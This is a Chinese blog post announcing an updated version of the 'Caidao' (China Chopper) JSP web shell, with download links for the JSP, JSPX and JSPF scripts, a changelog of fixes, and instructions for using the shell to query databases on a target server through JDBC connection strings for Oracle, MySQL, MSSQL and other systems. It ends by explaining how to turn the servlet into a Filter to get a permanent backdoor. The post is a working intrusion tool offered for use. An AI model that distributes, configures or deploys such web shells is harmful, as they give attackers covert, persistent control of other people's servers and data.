PHP & Java

Open The Door,SF Express!!

菜刀Jsp脚本最终更新版

yzmm
Tools
1020 阅读
0 评论
脚本下载地址:
JSP脚本:http://xsser.me/caidao/css.jsp
Jspx脚本:http://xsser.me/caidao/jspx.jspx
Jspf脚本:http://xsser.me/caidao/css.jspf

详情:http://xsser.me/caidao/1.txt


修复上一版BUG: 

1、修复Oracle无setCatalog的BUG。 

2、修复菜刀中一切中文乱码问题(包括查询、文件路径、文件内容、SQL导出的文件内容、文件上传等)。 

3、修复500错误Tomcat爆出密码问题。


功能增改: 

1、新增查询参数:--f:-to: 

select * from sys_user --f:-to:d:/1.txt 

select * from sys_user --f:1.txt (--f参数依旧支持) 

-to:后面跟的是要保存的绝对路径 

2、修改数据库连接方式


其他问题 

1、菜刀上传功能在新版本的客户端并未传参,所以新版本无法上传文件(可修复,懒得改,如果想用文件上传功能自行找老版本)。 

2、菜刀编码问题需要在连接Shell的时候指定编码,这里的编码是全局性的。 

3、菜刀新脚本默认编码是UTF-8只不针对菜刀客户端,浏览器Web请求可用。


连接数据库问题: 


1、修改了数据库连接方式如Oracle连接方式改为: 

<T>XDB</T> 

<X> 

oracle.jdbc.driver.OracleDriver 

jdbc:oracle:thin:@localhost:1521 

scott 

woshimima 

orcl 

</X> 


jdbc:oracle:thin:@localhost:1521是对应版本的Oracle的URL地址。localhost替换成目标IP、1521是默认Oracle端口。 

scott是用户名 

woshimima是数据库密码 

orcl是数据库名 

其中帐号或密码可以为空的表示方式必须是:[/null] 

如Mysql空密码连接示例: 

<T>XDB</T> 

<X> 

com.mysql.jdbc.Driver 

jdbc:mysql://localhost/test 

root 

[/null] 

</X> 

[/null]表示空密码 

jdbc:mysql://localhost/test当中的test是数据库名 


其他数据库连接方式: 

<T>XDB</T> 

<X> 

com.microsoft.sqlserver.jdbc.SQLServerDriver 

jdbc:sqlserver://192.168.1.132:1433;databaseName=test 

sa 

woshimima 

</X> 

databaseName=test是对应的数据名 

sa是帐号 

woshimima是数据库密码



连接任意数据库: 

ORACLE: 

oracle.jdbc.driver.OracleDriver 

jdbc:oracle:thin:@主机地址:端口 

帐号 

密码 

数据库名 



MSSQL2000: 

com.microsoft.jdbc.sqlserver.SQLServerDriver 

jdbc:microsoft:sqlserver://主机地址:端口;databasename=数据库名 

帐号 

密码 


MSSQL2005: 

com.microsoft.sqlserver.jdbc.SQLServerDriver 

jdbc:sqlserver://主机地址:端口;databaseName==数据库名 

帐号 

密码 


MYSQL: 

com.mysql.jdbc.Driver 

jdbc:mysql://主机地址:端口/数据库名 

帐号 

密码 


Db2: 

com.ibm.db2.jcc.DB2Driver 

jdbc:db2://主机地址:端口/数据库名 

帐号 

密码 


Informix: 

com.informix.jdbc.IfxDriver 

jdbc:informix-sqli://主机地址:端口/数据库名 

帐号 

密码 


Sybase2: 

com.sybase.jdbc2.jdbc.SybDriver 

jdbc:sybase:Tds:主机地址:端口?ServiceName=数据库名 

帐号 

密码 


Sybase3: 

com.sybase.jdbc3.jdbc.SybDriver 

jdbc:sybase:Tds:主机地址:端口?ServiceName=数据库名 

帐号 

密码 


PostgreSQL: 

org.postgresql.Driver 

jdbc:postgresql://主机地址:端口/数据库名 

帐号 

密码 


Teradata: 

com.ncr.teradata.TeraDriver 

jdbc:teradata://主机地址:端口/数据库名 

帐号 

密码 


Netezza: 

org.netezza.Driver 

jdbc:netezza://主机地址:端口/数据库名 

帐号 

密码 


JTDS驱动连接MSSQL: 

net.sourceforge.jtds.jdbc.Driver 

jdbc:jtds:sqlserver://主机地址:端口/数据库名 

帐号 

密码


版本下载 


其他: 

1、菜刀jsp脚本更新版.jsp为最新压缩包、菜刀jsp脚本文明版.jsp默认注视掉了写文件功能,菜刀jsp脚本无压缩版.jsp是直接把代码格式化后的效果、Chropper.java是Servlet版本。 

2、关于功能问题,做得太强大了某些便宜会觉得不应该所以这个版本并不是最强大的版本,那样的版本也不会放出来。 

3、菜刀jsp永久后门实现这个功能在通过修改Chropper.java为Filter然后修改服务器某部分配置即可实现,有需求的同学自行修改。 

4、如果有其他BUG,后面就直接在这帖内说明,不再发版本。

评论 (0)

发表评论